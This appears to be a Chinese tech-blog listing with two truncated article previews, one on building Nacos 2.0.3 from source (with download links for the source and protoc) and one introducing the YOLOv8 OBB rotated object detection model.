目录 问题1 问题2 问题3 问题4 简单记录一下nacos2.0.3,编译打包的步骤,首先下载源码,免积分下载: nacos源码: https://download.csdn.net/download/fyihdg/90461118 protoc 安装包 https://download.csdn.net…

YOLOv8 OBB 旋转目标检测模型详解与实践

引言 在计算机视觉领域,目标检测是至关重要的任务之一。YOLO(You Only Look Once)系列算法因其高效性和准确性而广受欢迎。YOLOv8 作为稳定版本,在目标检测领域取得了显著成果,依旧能打。本文将深入探讨 YOLOv8 OBB&a…